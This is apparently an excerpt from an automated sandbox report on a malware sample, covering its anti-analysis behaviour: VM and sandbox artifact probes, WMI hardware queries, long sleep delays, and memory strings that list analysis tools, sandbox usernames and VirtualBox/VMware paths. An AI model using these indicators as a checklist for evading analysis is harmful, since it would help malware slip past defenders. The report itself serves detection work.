              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fontview.exe PID: 4020, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: FirmwareTableInformation
              Source: 226F.exe, 00000010.00000002.480422025.0000000002F20000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: DLLREGISTERSERVERWKANIMHDMAWWV3SZQXYVBUPQC78ZCSCYZEXUSDVMOYWFSOSYSANDBOXK5IQR5XKKHFI0OIXFMGQKSOZVXBFCBSXP0CQKIPRNCYQHM3WLLXT6CDBBS26ESKV7845SWCP2EBLGWHVHDTWSOGZ9U9CGZZSDH2UM9TZTCXYZLXSGKNIDIWISTXFFJPSHTTP://GEKJEGOUDN6I5FBCES.JOMF6MTOBKL32EAI1QWQXSXPNFYV2SMICROSOFT BASIC DISPLAY ADAPTERAPXALPLEWOMRTXOQBIS5VVQOZJTDWDYPDWOJSVZO2QACQSIOYXZAFZ3U9IKX2BQN6EZZOXJP5PSUZKQMTGHZQELR5EG7GRIMERCTFOUNCFE4BGUM7H3R60PJIOCTMJ0M%LS\%D.DLLQU673JXMPB9XS6BLT0XDS1ALT0EJ5HLLAKOWFXNBJFIIOLTKI8WPBYDTNFYR40QJP9YSA5NKHRYBKS7IXE6TWUFX1EVDSUKHNIFAX TEGAWO NIP XEHN9YXFM4WGP9YUO5HXPMC4XQ1BZLDJLNGVBOXTRAY.EXEVMWARETRAY.EXEWECHAT.EXEVMWAREUSER.EXEFIDDLER.EXEPROCESSHACKER.EXEQQ.EXEPROCEXP.EXERDPCLIP.EXEWIRESHARK.EXEKAWEXI GEQUECI BOVOJ.EXEVBOXSERVICE.EXEVGAUTHSERVICE.EXEVMTOOLSD.EXEPRL_CC.EXEHTTPDEBUGGERUI.EXEHTTPANALYZERSTDV7.EXEPROCEXP64.EXE9VCQBULREEOHDRQECLOUDSAFELINEYQ7T94QZPUDEORTE80URPBYHQ3908APEYCDDGGZJIPRJTKOE8J4WDLLBX1APOW9EVBZ1UO2T2UBMGTUDBSQDYJSBALF5CGVCSFIMBSIBECUOLZPCIK2VP28IR0VTY4TBDYVLFRSD5XNE93CYIIGVV5KBWQ4W2ROU3OQVPIRDLVGRVMVTMQRP5J7SUNTW6WJSCCDMAYGHINOZWAXRSZKCI5FN6D9Y9HJRZHIX2JJ5NDQDFLBQ7GSN9CORX41KRUAQXIHNEOIQB1VONHHQFPG6N3LIJPAESKGQBMH2WFPZKMIH3JPNW2WWL4QOWW0SAVLN7QPQACULBYLOPUMLDJFMGRXYRKQKOVNJKRD4PQP2PQ8FNC7JABGGRSW4W0K7VSSICQYE9JT8N0NVH1MITQSNOGZQBXMIJYLHV2DLCZJ486OVC7EHTPLWZ4NT1DG4JSQGYZCQBMR6MBLZRXJGOXTXCYOA7FBPN0EGH7EX8DG8NSYCSAOGD5G0NV7R0LVA09KGCAWTJO5TB2I2LHAGZRMZ4T0EPASO079GSLJNUY5E4DLIUTNFLXFUZSNAEVRRIGWCHIYUGQ9HHPQODBLBIAQMME3ZWAAGKEJB4GPXYSRTR5EFN43BBTXITK2KKFOG8JCARLOY8GS3RRVRRJNAUFJSZGAKWZM2DEQ8OCWPZQ6O4RIWMRY77FLBKVUSFEYWTPB6Y2CTOYPQLWYAQAY5DNDXG1BSVPPP4JQ5WXP1OQ3Y3DHBZRC5X4KW1CN7YJDB9J450JE0S2RDQL7GXWP4ZKMA4WMYVM2YZR24ZUIL8P9X5RU6F5F2HM4YAEQ4STV1PKJ0
              Source: fontview.exe, 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WQLRANDOMRANDOM NAME%THISISANINVALIDFILENAME?[]<>@\;*!-{}#:/~%%THISISANINVALIDENVIRONMENTVARIABLENAME?[]<>@\;*!-{}#:/~%CMDVRT32.DLLCMDVRT64.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLDBGHELP.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLLTESTAPP.EXEMYAPP.EXEKLAVME.EXETEST.EXEMALWARE.EXESANDBOX.EXEBOT.EXESAMPLE.EXEJOHN DOEVIRUSTEST USERMALTESTMALWARESAND BOXUSERTIMMYPETER WILSONMILOZSMILLERJOHNSONIT-ADMINHONG LEEHAPUBWSEMILYSANDBOXCURRENTUSERTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\A\FOOBAR.GIFC:\A\FOOBAR.DOCC:\A\FOOBAR.BMPC:\123\EMAIL.DOCXC:\123\EMAIL.DOCC:\EMAIL.HTMC:\EMAIL.DOCC:\LOADDLL.EXEC:\TAKE_SCREENSHOT.PS1JOHNKLONE_X64-PCSYSTEMITADMINSWSCWILBERNUMBEROFCORESSELECT * FROM WIN32_PROCESSORVIRTUALQEMUVMWAREVBOXVBOXVBOXVBOXPARALLELS HVPRL HYPERV XENVMMXENVMMVMWAREVMWAREMICROSOFT HVKVMKVMKVMA M IVIRTUALXEN0PARALLELSVMWARESERIALNUMBERSELECT * FROM WIN32_BIOSHVM DOMUVIRTUALBOXMODELSELECT * FROM WIN32_COMPUTERSYSTEMQEMUINNOTEK GMBHMANUFACTURERPROCESSORIDVMWXENVIRTIOSYSTEM\CURRENTCONTROLSET\ENUM\SCSISYSTEM\CURRENTCONTROLSET\ENUM\IDESELECT * FROM CIM_PHYSICALCONNECTOR06/23/99SYSTEMBIOSDATEVIRTUALBOXVIDEOBIOSVERSIONSYSTEMBIOSVERSIONIDENTIFIERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DESCRIPTION\SYSTEMVBOXSYSTEM\CONTROLSET001\SERVICES\VBOXVIDEOSYSTEM\CONTROLSET001\SERVICES\VBOXSFSYSTEM\CONTROLSET001\SERVICES\VBOXSERVICESYSTEM\CONTROLSET001\SERVICES\VBOXMOUSESYSTEM\CONTROLSET001\SERVICES\VBOXGUESTSOFTWARE\ORACLE\VIRTUALBOX GUEST ADDITIONSHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__SYSTEM32\VBOXCONTROL.EXESYSTEM32\VBOXTRAY.EXESYSTEM32\VBOXSERVICE.EXESYSTEM32\VBOXOGLPASSTHROUGHSPU.DLLSYSTEM32\VBOXOGLPACKSPU.DLLSYSTEM32\VBOXOGLFEEDBACKSPU.DLLSYSTEM32\VBOXOGLERRORSPU.DLLSYSTEM32\VBOXOGLCRUTIL.DLLSYSTEM32\VBOXOGLARRAYSPU.DLLSYSTEM32\VBOXOGL.DLLSYSTEM32\VBOXMRXNP.DLLSYSTEM32\VBOXHOOK.DLLSYSTEM32\VBOXDISP.DLLSYSTEM32\DRIVERS\VBOXVIDEO.SYSSYSTEM32\DRIVERS\VBOXSF.SYSSYSTEM32\DRIVERS\VBOXGUEST.SYSSYSTEM32\DRIVERS\VBOXMOUSE.SYS%PROGRAMW6432%\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPC\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\VBOXMINIRDRDNVBOXTRAYTOOLWNDVBOXTRAYTOOLWNDCLASSVIRTUALBOX SHARED FOLDERSVBOXTRAY.EXEVBOXSERVICE.EXEPCI\VEN_80EE&DEV_CAFEDEVICEIDSELECT * FROM WIN32_PNPENTITYOPENHCD82371SB82441FX82801FBNAMEVEN_VBOXPNPDEVICEIDCAPTIONSELECT * FROM WIN32_PNPDEVICEPNP_BUS_0PCI_BUS_0ACPIBUS_BUS_0SELECT * FROM WIN32_BUSORACLE CORPORATIONPRODUCTSELECT * FROM WIN32_BASEBOARDSOURCESSYSTEMFILENAMESELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMVBOXVIDEOW8VBOXVIDEOVBOXVBOXVIRTUALBOXSYSTEMPRODUCTNAMESYSTEMMANUFACTURERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 2\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DEVICEMAP\SCSI\SCSI PORT 1\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0SYSTEM\CONTROLSET001\CONTROL\SYSTEMINFORMATIONVMWARESOFTWARE\VMWARE, INC.\VMWARE TOOLSVMACTHLP.EXEVGAUTHSERVICE.EXEVMWAREUSER.EXEVMWARETRAY.EXEVMTOOLSD.EXEVMWAREVMWAREVDSERVICE.EXEVDAGENT.EXEQEMU-GA.E
              Source: fontview.exe, 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000002.467647145.0000000003638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK.DLL
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\dbjigstKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\dbjigstKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\dbjigstKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\dbjigstKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\dbjigstKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Roaming\dbjigstKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Windows\SysWOW64\fontview.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Windows\explorer.exe TID: 4536Thread sleep count: 405 > 30
              Source: C:\Windows\explorer.exe TID: 4780Thread sleep count: 944 > 30
              Source: C:\Windows\explorer.exe TID: 4780Thread sleep time: -94400s >= -30000s
              Source: C:\Windows\explorer.exe TID: 3596Thread sleep count: 529 > 30
              Source: C:\Windows\explorer.exe TID: 3596Thread sleep time: -52900s >= -30000s
              Source: C:\Windows\explorer.exe TID: 3544Thread sleep time: -180000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 3184Thread sleep count: 531 > 30
              Source: C:\Windows\explorer.exe TID: 2388Thread sleep count: 827 > 30
              Source: C:\Windows\explorer.exe TID: 2388Thread sleep time: -82700s >= -30000s
              Source: C:\Windows\explorer.exe TID: 2336Thread sleep count: 410 > 30
              Source: C:\Windows\explorer.exe TID: 2336Thread sleep time: -41000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 5336Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 1020Thread sleep count: 6079 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 2008Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\dllhost.exe TID: 5556Thread sleep count: 1744 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\336E.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 405
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 944
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 529
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 531
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 827
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 410
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 835
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWindow / User API: threadDelayed 6079
              Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 1744
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9522
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
              Source: C:\Users\user\AppData\Local\Temp\226F.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5898187.dllJump to dropped file
              Source: C:\Windows\System32\rundll32.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
              Source: C:\Windows\SysWOW64\fontview.exeMemory allocated: 55B0000 memory commit | memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\fontview.exeMemory allocated: 55B0000 memory commit | memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\fontview.exeMemory allocated: 55B0000 memory commit | memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\fontview.exeMemory allocated: 55B0000 memory commit | memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: VBoxGuest
              Source: C:\Windows\SysWOW64\fontview.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: C:\Windows\SysWOW64\vboxservice.exe
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: C:\Windows\SysWOW64\vboxtray.exe
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: VBoxTrayIPC
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: C:\Windows\SysWOW64\vboxhook.dll
              Source: C:\Windows\SysWOW64\fontview.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: \pipe\VBoxTrayIPC
              Source: C:\Windows\SysWOW64\fontview.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: VBoxMiniRdrDN
              Source: C:\Windows\SysWOW64\fontview.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
              Source: C:\Windows\SysWOW64\fontview.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: fontview.exe, 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMware
              Source: fontview.exe, 00000013.00000002.467740836.0000000003698000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445080033.0000000003698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor
              Source: 226F.exe, 00000010.00000002.480422025.0000000002F20000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: DllRegisterServerwkANimhDMAwWV3szQXyvBuPQC78zCscyzexusDvMOYwfSOSysandboxk5iQr5xKkhFi0oixFMGqksOZvxBFcBSxp0cQkIPrNCyQHM3wLlxT6Cdbbs26eSkv7845SwCp2eblGwhvHDTWSogz9U9CgzzsDh2um9tzTcXYzLxsGKNiDiwisTXFFjpshttp://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2sMicrosoft Basic Display AdapterapxALpLEWoMRTxoqbiS5VVQOzJTDWDypDWoJSVZo2QACQsioYxzAfz3u9IKX2BQn6EzzoxJp5PsUZkqmTghzqELr5eG7GRimerCTfOUnCFE4bGUm7h3r60PJIoCTMJ0m%lS\%d.dllQU673JXmPb9xS6blT0XDs1ALT0EJ5hLlaKOwfxnBjFiiOltkI8wpbYDtnFYR40qjP9YSa5NKhRybkS7ixE6tWUfx1eVdsUkhnifax tegawo nip xehN9YxfM4WgP9Yuo5hXPmc4XQ1BZlDjlngvboxtray.exevmwaretray.exewechat.exevmwareuser.exeFiddler.exeprocesshacker.exeqq.exeprocexp.exerdpclip.exeWireshark.exeKawexi gequeci 